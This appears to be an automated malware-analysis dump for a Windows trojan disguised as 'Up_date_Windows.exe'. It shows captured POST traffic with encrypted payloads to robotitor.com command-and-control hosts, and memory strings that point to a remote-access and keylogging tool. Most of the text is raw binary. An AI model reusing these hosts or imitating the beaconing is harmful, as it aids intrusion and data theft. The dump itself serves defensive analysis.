...\n....yI.Z.Q..Ou..t9hb?.Gl.....S.LL........*(.nqh.F..;...-.\.U.:..Y...,w......"r....e.f...\q..Y.....5.H.$"b.o.u.`..T?A..k..6yqZ..4.w.._r.....3.v`.s......ao$pzT....G...r)U.s..z.i.G....r.6....&....f.\...,.....e....!.<.....|.8.;k....p.7l.H...z.j..da:.`rPm..N...6.@..qK.e
.......3...Bf[..{...9.$...b.._g.....d...&.[.. .1....dd..Q&...C.:?.d.?..........0....Y.p..\....?W.
 .[..J

nb....,-...=f...@...1._.b..^..VI.......
.7|.../..

..5A...U.5..
....&.O...4..jt@Ea. ..
.%..S....c.J.g.L.n.B}...?..R.....=..T'..EI3IA..E...&....^q...7.<.
.....KK......,......:.d.p.....Z........2.}.Cq.pz..4....j.On...nE.;.^,..tAp.,..JRG...!XW3....:.D?.Fz!..[..29.#...`.U ..|.#..JV<

j......\....k.r..p}'..IWd.....^....W<.U....5v....%k.]..W..i.iA..R..8.!t[B..,....A|k....S.O".....

i..{CX...G.....KjJA..Y...._........iCX.g.E..t,.9......Z.]'y...3L...{.{S..0.<..Y../.....L.t....x..F..2....0...(..8}..k....[..Y._.@&.W.^...%.

..K.$`
m .-.P.S.`.....Q......d...5~<I~*m!......j....<4...9'Q.<.9..V.C6....z

..U.IH].....H./.4...E.. .....J.^.....8P..~.o.:...[.i....,U.t....A..........o8.c,..$....F........"s./ir....../.....:6.....D..<..7.g(.j.,w...Y..y!!..f.(..B.........XH......=....T.............V..!...e....v.$m.%.|z.'.&.zv./.
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Length: 4

Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu
, 27 Jul 2017 04:34:47 GMT..Content-Length: 4..Connection: keep-alive.
.DONE....


POST /?v=2.0&subver=6.21&pcrc=469500041 HTTP/1.1

Accept: */*

Host: rp.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 1952

Cache-Control: no-cache

...QzK....i.....xAz(....B.O$|.~W.<.....WW*.m..`v.S.mB..-.).7.....:.....m-....g.}Ey))> {l...k....9...{...H.7.=.`v...E......l....6.nW<...~;p...[...M......b;2..t

....;.
RE.aro....LA....>*....en.
....}#...YGrQ..p#Y..Mn...Z........[a..Y9..4.....I]...\.L....7...=......_.eQS}it..U?b\j.YQP...3R...p.qa;....x.TX.......w/F0xa3........{...1..z7.Ocp..9"....6.... ..D.!.BL..7...Q.........b....(.;8J....3I.....cK.2:.|}.)3...-CG.....Y......6.R./...Y....(......I.....?Ac"..@.&.....U......?.....Q..Sb. .r)~ .|Ol.w.........zB...f9....R.e.........YN..J. ..\Q....S.}......Rw.....td..... .

.v..j......X....
g......69.d]..$.....I...<.-*A.8..I.|..\.7...$.{....kG@.....|.

x..-....p....1.O...rN.!....3..!.....0..).W\.d...!.....D.<.p"....x.4P...RN.El....8...<f..B{cEs...Y}.}..#.._.'k..
.|2."W;.c..X.!....Mw.t-.<t....)...vj.mf/.d g...Qo..8.Ki6q..e........7U..$t....;.E-....,4Z?.<o....=..
.;...=...:.n.D..E8...@.S.J.<..X.*.. ......X..{'Lm

7.>.c.........b.D..lB..?P..|Y..
.x...j...t.O7..q_......s-..!..l*.|&.X.9d......).....=

.64.P.a.62.3"y...>()...~..]y].M'..&aS...H. ..........

N.*.F.....P.....R.l.8.........B....d....B_.L.z......j..Vy.A.....ID.2.\..#.vHT...0{..;..Zo.<..........|..6. .....E.9.Fk..B...*.....)d........h..s.N..c

.`.9..m.Zd..;t...3..DT>@z...p......,.Q-...p-.g.&.^..w?.Hv.q=^..?....a.
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Length: 4

Connection: keep-alive
DONE....


POST /?v=2.0&subver=6.21&pcrc=1203213041 HTTP/1.1

Accept: */*

Host: rp.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 1952

Cache-Control: no-cache

(:.] .N
.......O_V..._8_.S.c.C......^..S4.
.....UG.B.>l.

.Vk ,.?.......pB..",...(K......g?]...)......A....z ...b..h*...|.{..;YA.
.....V.R..P.{n...s`...KL..f/..f..yO.s.o.i....

..o}q.XoH...G[.=d]IzF..L.nxT}......KN.=.$5....E....m...`..zD?v..?,...f...../...T..e.:.Q..y.%fH...........K..

>.,..j0..@..tK..(.w..g*.ayKR.F.N..M..E..3ic.O.>G.L..)=....K..:.;./....q....,.._.;.....F...*

S..w...A>J&..
...O
'.M.....>.(.].D98.5]:Ot...-.,%Uyq.r.F.c....3\..[Z....3..1......."4.........gD.....jc....
qBz..G1...^..CJU......=6.,.
.[..x....n.0.&.,7..Oi{...b[=...(u.9....$.Y..9

....G.b.'...

.Z[.c...o......... ....?.....C.oY.h0O.w..........i..

.>./.gNg..........K........?.c.r.U.ly....F..!....R.........{c.(.!{....(.. .._s.d@".......`<..~]....sq....`..m....v.;.0.0.4..._O.*g.x.....C.or....I............s`V.;....U.......l.x{.z3....a.F..X.^.Hc........9.]IC.)7..|7!Ww...G~..$Z8..Y.5..YW...-.K....q0.l{..5Oo..[.!..jO.$..U..O.....o.JHL..Fu....S#u9..u3...
9....y.....z..B.-..)...Jt....5...}\..4M..W.IY..6....0). ..A...;.....4...k.7.;..O....;J..L:E*...?B.....lM.9.).2#.]..R.7..P4.9....95..< .D..~.D1A... ....o. .....l.-Yd1*z.....{..j.....3%F-.}.4...*.fQ.`h....;_......^.........;..@!.z.)
....A...P...[0'.k .=.......... %...Y.*%.............1\...<? l.1b....[..
d.I....z..b.}.G<1....D."aO...Jb...p/zQ.5..]..
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 27 Jul 2017 04:34:48 GMT

Content-Length: 4

Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu
, 27 Jul 2017 04:34:48 GMT..Content-Length: 4..Connection: keep-alive.
.DONE..

POST /BitTorrent/?v=6.0&c=958353824&t=441794 HTTP/1.1

Accept: */*

Host: os.robotitor.com

User-Agent: ICAS

Content-Length: 1776

Cache-Control: no-cache

.^.S...N)Tw?.G{&....G...6..c..'.K...K9...M=W...
....HZ...I_.V..Og.....w........H..B...=.k0.*.;s..............3lX............T.......T0....3A

..........'o2h.>b..q{..d..$.....0..&=..`..Oc@...G.A..~..<i~.E..H.......7.h...B...x.....E...q...<...9..J.q.0.1lBmU.f......C....~d..#..s......h..HM.....h.R....Qr...v..mj........v..d@...pV"o.mX.....q..u.*..j{.......# )......g/..V$.....rR........
...\P.....%..*..Wi....S;4s]Q.e.L.G}.Dr..F.........q....N../......3:....-K.^*p.=.......>........O.....by...a4..l.5..2y&w<=n..$.`.8....)Ll<9Ym.......;...o

..4...L.)..L.......N..y.u....5...qS....J."g..hyQ].l....H..r......j.TT^/>I.A.f..m.qh.A....*...%.....-.......-..5.........G...X...|....naB}.lt.Z...]...nv...9. ...W..............v.*b!......r...-.7O.y...VND.I.\........'^.P.d9..&.Ugl.7=_........a....6...GU..().t&M...b..&....`=.B.W7#.m85~...$...f....[$.=..yv*v...hpG$z.Zc.%;.21...kf.>.$....o.G.>...J..I...kq]D.....
....Vm.P.W:_....c.v..6C...u....T..I...A.......@%.Ez..gi........7.9..se...n.\8.<
..B......Z...x.s.....}..)....K.]...ps..4...a*l)X.Z.oh.:...x9...m!,Ctvc;.X...)-n.D....F8.a..2.:.A.8.;>u..s..lQ....^0.3.N.2...VQaC.$...Io..6g ...-......}.VNa....LH.V....4\.=,C.(..c...Y.m....R.u.[B....P..q..s.#=.m..W8.}....F...@.A.!.R....!..e....f$....h.d,...)~.$.rcy=._......tFV...@..au.....4.R.t.W...g..C}p.I......mu....9.x..$..lW..pr^.a....Gl...q.-XY..;$1Q..k.f.
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-Type: text/plain

Date: Thu, 27 Jul 2017 04:34:46 GMT

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Server: nginx

X-ICSCT-CC: UA

X-ICSCT-GICSET: 137156

X-ICSCT-IP: 194.242.96.218

X-ICSCT-SERVER-NAME: ads-slave-162-p-production-eu-west-1-i-02c928d396e695deb

X-ICSCT-TIMESTAMP: 20170726233446153

X-ICSCT-VERSION: v1.6.2

X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a

X-ICSCT-XS: 91bba9083b637bbb85f2bc525458ea3d2e0cb405

X-Powered-By: PHP/5.5.38

X-Robots-Tag: none

transfer-encoding: chunked

Connection: keep-alive
3647...^.........9..j.;...J,.Lp......4..;..W..I.......1.iG...4..M4=A|.
..;_|Y`...j..L.......LO.?s.e.:...|,1.....".z...S.......)....T'./_)...h
_.s...A....../w..[J.....CA......Za=-2>.....Kf.b..|?..4.pt..[39..~c.
...=n.p......]|.!N9|8|.. .g.r~../........7Sg...S8.S..._.....>....sr
s;.vY...z..G....!....f0......fW.N....h..#...z.X..yU.2...4L.2.H.4.....i
..S.E.w....=..xi....b.8n....H.j.`.vr....nQ... vVf..h..#......)... ....
0..6..u..0......(...Y..;Wor_...?...,....X="l.....UK....F.k......!...Q&
lt;..m..QC:r...FN..C.q...O._..&.......{.....9.U...o..^............B...
aU-..........e0.Y..I.O....g.....ZX.Y.{.......y...O.0.6.cU..s._....C.Uc
%_j.i.O...}..e."...;"..V.H....C{m*i.Ia.......T.|d....<....|...0.n..
...2...@..\...m".A....A@.).....2Lc.....V...............O@.i]....vyS..1
".q;.~vI.rW..,...E4.70...`...tu.U..B.x.....t...%n..z..K....f.W.hM..ovV
..@.9.o.4S.4..".3.......\.....aqy....Q,{3... .M.X.....V.....r....TV.&g
t;.P......Q...6N.n..2V'....m....>.C..4...l...I....qs.Z..k`.%. .P.d.
.b;x.[.o..a..zN...&7.l.../.4U...r.1.c0...q..ff.N.2.......&..h4...~.g.C
*..O1dFa..............T.U..U..8u.Q..&...".u N.Bz.(..R._..J./n.R!"..bb.
...rJ0...8>..k.)M.2.^[..........Q..._..q..~c.b.4{i...(.)o..V`......
..k.. A....vZV. k...:....5."..0......J..Y.O....`...v.. *....q..n5...6.
y.....m0h. J.....c..z..=m.'sZz.(.-*R.....Z......\r=F.....F.U .}....v/.
.A....~.....t/aV.P...g......$.,`.C"..\;._X...R).#.5..|4&.....K2.wo....
He..LR.RY.........8.r.X.#.3...#......&...R..j.=%2y<^~.......c3c.[..
...=.....3W.{D.>Y ...t..2...[E./f(.(..I&..v.UA...9.::...4.f .Yf
<<< skipped >>>

POST /?v=2.0&subver=6.21&pcrc=1504424460 HTTP/1.1

Accept: */*

Host: rp.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 1936

Cache-Control: no-cache

...4.....>.K..~......#f~.7N.. ...P.Mh.?|C.u.pmB.........ZVX.....K[]..7........!.....K.e@.....3....[..|.p'%..z..X....).~...q<f..-\...T......3fI~..@Z#4X..^z*,xD.........kb.c#.)YY!<.9..E.....Z.N..y.......nz..2._]rWn&g.i..N..cbz..={.........B{..[.{..&.$R".u{...]a...k....$@.

\...;.........nS.J.j..u.......xj.P...e.b)G..0..2...o...#......#...!..."..x..Mr.a,..2w...)p...]
...%....Y...X..YI9.'=...X:.6.`............^IA.B.!z.~d'J.5_.7..b...B'.le..

.A.........F......5p..!..l..P..N.v.&..q.>..f.<d....!.
.|....^..H`...
.<.:....../.8.....vv..=..J.6.vK....1...W/7O..:.:.m.....>....U.M....?_.......|'....X...9.J.P.p.C.o/......r.....|k....#_0!..c.D...G..Vz...V.....i...^../}.X.(...nEI.. E.;;....H.V2^"...V Y.J^.x....g.......
j.*2.........Rnc.....~....g/..........e.U.).G}.h~G..1.=.....0f..d.......6.A

..y.....F.K.s)X...X...j.........z.>(...m......)....n......et..7...l....,Nys..........O.D....d....

........K@.......Q.....Y6....x...ss.......N....v

.j..-q.t..0e..oy.0...y.,..O.T < .......ZV.O....`.CX@[...ZHt..#.C...*....xa~:j.........8....c..%^`
...%v....u.#..$.Z......T..oL.s [Z..2CWs.^..]....?..."...y..V..^#..:...AFR.=6@#.Lw.z....8..*V.~...l.d.S.....s%...F.../....T.. "eH....>b....i..k....<...I...OX........V.#.#(Nl0.......].1t|:......n..;....$`..9P5t...T..I..Tz-z...[.`J.t..j..RY.t...s..f.
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Length: 4

Connection: keep-alive
DONE....


POST /?v=2.0&subver=6.21&pcrc=303144880 HTTP/1.1

Accept: */*

Host: rp.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 2928

Cache-Control: no-cache

.I..G.)E..,(D-..V.....]4.......]..B..4...iUa.@...T..6BC..[....}....6S>v....#..a*...y.%7........=....r..........D..:.J..l......P.<p.!..a.....z.U. ^.y.oyHzI.h=...;......H..@..':v..T.m...`gO..*Ef...2>S..Kx...L8.q.r.... ...w._9.4.N.f.......F.E'8W...zs.`l..d.......G..C@f..g{........bE....k....g..c..g.f..@...g....?.6....".0J....~....R..M.-.....A..Vwj......._.kX....G..._a..D@..m.?A.....m. .6......E&\...c... ER. s......1..G...../u..g....C..g..$.....F..w.l.....'.,...:`O{.C...g......\.R.6Pr97..2....6...Tw..a...0L6K..*t..R..kA.S.......4.a.<...T.wl..h......Z...(.).i#.<.O.l`F.vO.....Py.......R..3.....z..s....o.0w_...&.u{..*....$......jh.^.G.AY.........c....U..J%....e..a.-I|Z..GA[.x..O......u..1.!..FK.........TDo.LV...j...L..c..3..z...-...n4.4..HR.(...}.....a.e.<8.j..]s......=.a.;.........1.....A[.G ..^.K.}.'MQhc.~W4x"H1Z'>..se
[.iXt/..v..=...'.}.-.....C.y.v.k.../....;.@....t.'4EZ..N..M.E..w...|}c...#....|...'jH...i..5...5.z...{.......|.^4D.N...F.-@K..mhSM.
.`.L......'D.W/I>[...].y./k..6...@>c`...._.....;.PA..v......7.~_.......]...|..."i...u~.......)..>.......S.~..he..B..F.4c.>......v.Bdf......>2.....
......l.5#..y...EDXx..Br/.W..`y(j.......cA.....-Y
..8F..).'.;.g.3w. ...<.~..?r...c.|....."..{g.R.....o.c.\.#..'./-....vL.2.Mn.'.$....V..6F._.|=9....%|.Z......_.^O...s..{....
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Length: 4

Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu
, 27 Jul 2017 04:34:47 GMT..Content-Length: 4..Connection: keep-alive.
.DONE....


POST /?v=2.0&subver=6.21&pcrc=334261017 HTTP/1.1

Accept: */*

Host: rp.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 2016

Cache-Control: no-cache

W..$...1.:.A].PP.].A%.v...q.......g.WH........".....A!$s.c!.y.].,..q...7|W.d\
.'...o..O..D4..3..^@S...S.u.(i....".K....6..?B\.j{.X....y..\..86vC....S...*?u....6.....#^.f.....E..7....Z.X.o..?.......Q6q...f.x...9.|.5..[..QG....Um....V !.{.nK.........~"6>%..=....>.....P...9(..pI5.1R.\.z2j.k.UsP..^.J..'9........9p}.YQw.]...2...i...?..R....t....f..C/..%5n.G".a=4y.p....l.m.....e...@...w........L..}..i......6..~~...;........it.n...6.f}..a..~.....4........D......]-.P..w.:...}....."..O$l...........w}.. z.N..q...O.G..;...?.......2....3......I.>j.;@R..J...bbt....Gq.9.;..G%. .....y.m.....&.".^n(#...y..1,"....A..&J.M.3)..]...W/h..NS'.......\...\...?.....I.............G.....Hzc. S&;|..d.T....z..b[.W=...l?W.KW.}".G..x._A.K..<b. .|..f./...9~.Ym.....!.G\.WE.DD@......I^..Y.vT....E....UP...X.%....
)LH.k....b.A....W%....qe..w...Ew..0a.=....\...X..6"9."WT`..9...3...T4.
'..43...U.../..yyKE.>.V.:.SL<.O.i..j7...._.Q.......E....j.S...|.b~...c......L..........<.rj}f.......<x..,.<\.A...4F..[....#.Y.}..bX..M....}...9n..H.<.....=..C~..~i~.BytE.....M.G7
L...S%.kyj....v...C..8...;`6......../.....G.?..BZ.|.6.P.k.GU...7...~..]3O.z.mu

Y.... c@Y......{Qw>..L..9.1f.k..b..p..S'b....*..o.P.?n...].......-........@X..t.._nd...w=...._!.!^X...t...Q.(.xPO!J..C]Zp.!j....Przn`4{....'..Ga......

..x.w,.o.>
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Length: 4

Connection: keep-alive
DONE....


POST /?v=2.0&subver=6.21&pcrc=1429957044 HTTP/1.1

Accept: */*

Host: rp.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 1936

Cache-Control: no-cache

xg.
.......F....P...~3....K...n. M........Oc...-......[.j...o.zW.dG.l..u.h}RY....J`U......&.Q..h.r|..._w. j/.w..@..R.{t..K.:p.bTX.s.....<.O..a.o.M........f..i..Y...$G.F......D;.e.z.... Mt}.......Z..o.....c...[tY...]..$Q,$.Q..*."....~..F....>...(.....,.x.t[...0.Ka.5B......"m.m....:.y...]...K.~.o..Ge.O/......I.x*xY_..$.....c....E....f.8........oXR.'9.!H.[.-.X..uC.K....u7..~...(.x.z..(.h. (.Z2...-..
JB.....M.....Bn-.6.;/J|3...(4_

..p........eOul.^.;E..WU.m,.)g2...a|.%.....4D..9.e..EV.=J;.Ft..1.....D..F*.;.Wl....k}mJ"....5F.t8.;P;...`..F.... ........6.qu{.$.q.S......?.hYa....%.MYs..m.......x.... N..i.X...,,...C]...Ju..._..........a....#".a...O..Y.IA.H9.0TfP...0G...{..6...$..M.. .....!.

eq.........[.T7.l..|%.. ........)H.z....x.u..M..Lf..../..K.T.}..>....c...#.kL....)..gz.....o..........B.....}.Z..U.D5`...d.2b.J;?...#......).a.,.I.`...p.~.^....mw.)1q.....Is...H..9.-....n...:.i<.FA.m...Ez)3.q....]Hx.ryVC....xf.4...h.,... ..0...X.-..'L...</>o..d>.rI.b...,....2.@.V|.......<...s....

..".X.&.}f. ...[.E..d.po..m.J..rI.... @._.......F..P.2.bw.6.p...........>D~.Vl.W.&..E.:5]aH.9.Z.;.1.<.H....t2c....gE...n.......[..!#........i<I.&.k@.....Ke|..S....o......-.,NTd...l....$.t.@
..r..w.W....=.O...l!-.txG.r...u.j.>.S.h.Wx.{.T.&F&.....
....Z".. Sh...#...}....|S.<...l....M..=.
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 27 Jul 2017 04:34:48 GMT

Content-Length: 4

Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu
, 27 Jul 2017 04:34:48 GMT..Content-Length: 4..Connection: keep-alive.
.DONE....


POST /?v=2.0&subver=6.21&pcrc=384229237 HTTP/1.1

Accept: */*

Host: rp.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 3584

Cache-Control: no-cache

..Sq.XZ|.....~ ....]Q.....>...Y3

>N.vc....3..E&

?&pq>.@. ........T....|......dy ..(..S.X.\"......F..R........3..|S.`....Wb.H.S.-.s&z~`.9...g....2]..,.b...$....S.l. ...3..A..(..&.....z..o....(.W..*..F..c./`.u..$}...4...k....h^?..)..>u...27....N..Qf....h..xM].;.rM..E... J...e).....><C..* e".

...=p..@E...........\..8~... ...K<.%..Q... .h..6....d`.}.p.tlw3`..<.;5D....F........L.V-...5.../J....._..1tm...>3....nZ.k.....]%U......jP....D..v..M..p.w#.....9.r.x.._St&M,@.........j...........Sfr.q....-

U....vF..B..N....@..Z........:.3C.....3......X@.w..30k"..x..K........%x.#..i..9e.........V....\G.4..@..._..i.4...rVS...Y.~I..b|..'...6.....Z. ...cU..*%..-.u...(..p.....h.a...Ln8z...0.BQ=..K..

........a......*.^i.......Z...

..Ni..4.i...kZpd.FO<...%...[q....%A........u...x....P.6...e...Z..(.......e$..#M....R.8..1...............=
.O......SoI.n.c....<O..... i2.g..C.}w.7f.RBB.V)KM....\....d.-.yB.u..u[.}0...j.....`.$.....D..H?..`..,%.....u...?.m..5.....se......'xB.....A.d.%.....9....N.b....w..?.R........S@t.....FN.....A.j...d...6...@A..JjxV.v.....A)I...\..........~}.. .\......%T.vf.....oC.....c....#_a@.....<.....k..*...........<#...n....o*..0?t.(.......>...I@.o.y.t._.nA.C....w*Z .WAF.YF........'..$I.-a......u>....F\....!|iBW#......J.....0i.uh..w..wY..:.........
..
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 27 Jul 2017 04:34:51 GMT

Content-Length: 4

Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu
, 27 Jul 2017 04:34:51 GMT..Content-Length: 4..Connection: keep-alive.
.DONE..

The Trojan connects to the servers at the folowing location(s):

.text

`.rsrc

@.reloc

lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet

g%d~v

8{{.sz#

~qkMsG

>C>.ie

.mQf*Z

\2.Kl

Q.hEej

.my"j

%s&eX

b%S&T

NqU%f%y~

y.Lu~

fG<%u

?[.Tqr

)k.nD

\%uZ2

.eIe^ <

%XnC^

>(%fl

s=;%x[

"E)n:%X_m

aU%sm

zXo%U

Z.gyx

.bQ91

o^ %D

K7`i3.Gs

A|Qd.FUl

(.fsr

v2.0.50727

Up_date_Windows.exe

Up_date_Windows

Microsoft.VisualBasic

Up_date_Windows.Resources.resources

Microsoft.VisualBasic.ApplicationServices

.ctor

System.ComponentModel

System.CodeDom.Compiler

Microsoft.VisualBasic.Devices

System.Diagnostics

m_MyWebServicesObjectProvider

.cctor

get_WebServices

HelpKeywordAttribute

System.ComponentModel.Design

WebServices

Microsoft.VisualBasic.CompilerServices

MyWebServices

System.Runtime.CompilerServices

System.Runtime.InteropServices

System.Text

SevenZip.Compression.LZMA

System.Resources

System.IO.Compression

System.IO

System.Reflection

GetExecutingAssembly

System.Collections.Generic

Please contact abuse@imminentmethods.net with the hardware id: f2772b6cb9bd480cca846f4a2f753f30 and company name: CocaCola if this assembly was found being used maliciously. And the offenders license will be banned. This file was built using Invisible Mode

8.0.0.0

My.Computer

My.Application

My.User

My.WebServices

4System.Web.Services.Protocols.SoapHttpClientProtocol

0.0.0.0

_CorExeMain

mscoree.dll

data.dat

lzma.dat

mshta.exe_3704:

.text

`.data

.rsrc

@.reloc

clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32

msvcrt.dll

KERNEL32.dll

ADVAPI32.dll

RegCloseKey

RegOpenKeyExA

_amsg_exit

_acmdln

mshta.pdb

name="Microsoft.Windows.InetCore.mshta"

version="5.1.0.0"

<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">

</asmv3:windowsSettings>

Kernel32.dll

2kernel32.dll

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

MSHTA.EXE

Windows

9.00.8112.16421

svhost.exe_2916_rwx_00400000_0005C000:

.text

`.rsrc

@.reloc

lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet

g%d~v

8{{.sz#

~qkMsG

>C>.ie

.mQf*Z

\2.Kl

Q.hEej

.my"j

%s&eX

b%S&T

NqU%f%y~

y.Lu~

fG<%u

?[.Tqr

)k.nD

\%uZ2

.eIe^ <

%XnC^

>(%fl

s=;%x[

"E)n:%X_m

aU%sm

zXo%U

Z.gyx

.bQ91

o^ %D

K7`i3.Gs

A|Qd.FUl

(.fsr

v2.0.50727

Up_date_Windows.exe

Up_date_Windows

Microsoft.VisualBasic

Up_date_Windows.Resources.resources

Microsoft.VisualBasic.ApplicationServices

.ctor

System.ComponentModel

System.CodeDom.Compiler

Microsoft.VisualBasic.Devices

System.Diagnostics

m_MyWebServicesObjectProvider

.cctor

get_WebServices

HelpKeywordAttribute

System.ComponentModel.Design

WebServices

Microsoft.VisualBasic.CompilerServices

MyWebServices

System.Runtime.CompilerServices

System.Runtime.InteropServices

System.Text

SevenZip.Compression.LZMA

System.Resources

System.IO.Compression

System.IO

System.Reflection

GetExecutingAssembly

System.Collections.Generic

Please contact abuse@imminentmethods.net with the hardware id: f2772b6cb9bd480cca846f4a2f753f30 and company name: CocaCola if this assembly was found being used maliciously. And the offenders license will be banned. This file was built using Invisible Mode

8.0.0.0

My.Computer

My.Application

My.User

My.WebServices

4System.Web.Services.Protocols.SoapHttpClientProtocol

0.0.0.0

_CorExeMain

mscoree.dll

data.dat

lzma.dat

svhost.exe_2916_rwx_00630000_0000E000:

,gt15.gt1

svhost.exe_2916_rwx_00760000_0000B000:

%8XCL

€DL

%8xDL

%8X}L

mshta.exe_3704_rwx_05280000_000B6000:

.rsrc

kernel32.dllwG|

ORT_(_.SCK_LI

=(()@-3$-

Keyworm

9qP.VI]

%s[%d]`

%s_%d

.FDiag

|.rz$

d@.LPL

L("%s",4),"

4'.Yt

$.ZZZJKr$

GHotkeys

\s0^%F

=-%Si

%uorT

'p%uG

tLcibD.ZP

jn^Io.ye

.DZOLdyE

.Miz'.

,-\ T,/.Om

UFyfse,.ft;:/*&

webqskv`T-Y

s:.LGw

v/.ejyvb`Xx

U.Fl/1

hgl,.Jfkw

BxPf-?.CG N

%uJzpc

R.tV.cP

uYvT.whxyW

fpRWup(.Jk

.1.2.3

THttp

,M.DJ]

[W 	u

.kZv4

rvaT.fk

2N0RhwbG.xb@ 

4,0404~3

.PD&B

ic6.fAW

RI.AT

.GGIj7

mw.ll

{d.vLO0V

R-T.FK[[

%5x6.

uz`dm,.enumnqc

p/).Lq

.Kdkgfbz

z.gwp

?ET.Rn

/v.mo

rk/(.yJ

n?.:0_FAJ@T.cgm)

.dDHY

.dlp:0Xc

Zw W.dLP$

>?59:;.ZQ

6?0N2=.Lq

OW]E).rG

(l.ch

8Ah%D

E-.ow%

4*:.ep

.jkgWd`omt-@.r

Tc.UvX

x`z5.yH<

BbG[DO.wL

xTz.yOrs

.Lb/[y

)hix.CBOb

"O.vR

NAER_[URNDT].Lw/OFL[^\\

@e.vi

s`SQ.OG

5.gCo?F

Ib@,bnprbe.RG57]

n/vk0/B.uP

LJ_.ge/ROUHUO

ym^rk.Um_gt%B

Cffiw.jqW

Oo&%s

..WAHO9[Zcn

xj.Cj

UrlHk

pKey?q

URLMONT

U:.mI2

.PP.'

wu>%x

'%s' (\B=

0fMsgD

VVV.U

Q.HH0

wi A Ô

%F[" 

un`iyni</.VqL

.Advi

PPi`djv D.zYZ

\Z@Y_MZNn.JL

W.QX&I

KPERHCV.Zblf)kq,

x!.JK

ZnyzgcEi.Tc/OnAOhEd

t,T*.lJ,e

V.OS2

&e"<.oo(

lMSGg

anldf.RW

r.vY?

gc/.vgH5

_3'.rB

|<Sl.jq-6$.

TmjC.Oo

rf.aeW(/

/jehGbeags.qBhkk$

$6-A%D

NPIPE_

HKz).jGN

LNYCD_^.eJFLKPV.c,S

HMVH9>.PE

.CONTA

v=.vN

!~.oEh

xEXE&

$.Pg$

zfc.bz

h*y.Mw!_

%uKjK

>~z>7(.cT;,_

:K`.vuKn

a4-I.cW*/Bdhc

BR5EtcPS

idz.fw

ooc.KCWW

.kdek(o,

0.HLAB

f'T4m]5D.Cw

oMfnaqk:VsoP.xX

UvOifj<-6.vZ3-\

daG,.Voyn

zdi`%cz

rK.Ikcct*QiDhW

Ro.JD&ZU

s.ZR3

MS%Sl

%C}(BV('

F=.qn

.FVc[qZ~_~WbN

ÖI!

Ff%Fl

.FI0^

wEBd

ÔL*

G1J$6%C

jRT.dJ

D%FN>]

T.Ri[

.zy8s

-%f)k

J_.Jc5

ZU.bHHl

/z.lV 9

"$ %),'8

$"!(&&$' )#

H.JXA0Db

1 0 .'7(2':

.PMDF<7I

KERNEL32.DLL

advapi32.dll

comctl32.dll

comdlg32.dll

gdi32.dll

mpr.dll

ole32.dll

oleaut32.dll

shell32.dll

URLMON.DLL

user32.dll

version.dll

HtmlUIInstallerDLL.dll

mshta.exe_3704_rwx_06031000_00180000:

kernel32.dll

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

htKeyword

EInvalidOperation

u%CNu

%s[%d]

%s_%d

.Owner

EInvalidGraphicOperation

USER32.DLL

comctl32.dll

UrlMon

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

TKeyEvent

TKeyPressEvent

HelpKeywordH=

crSQLWait

%s (%s)

IMM32.DLL

AutoHotkeys

AutoHotkeysd

ssHotTrack

TWindowState

poProportional

TWMKey

KeyPreview

WindowStateH

OnKeyDown8

OnKeyPress

OnKeyUpD

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

User32.dll

A`bng`@ikc-4,uUxlxs-4,Ht.HA

Vh-0,Cd`jiVhlxwd-0,tLcibD.ZP

TThreadExecuter

TScanAllWindowsCallBackData

Portuguese

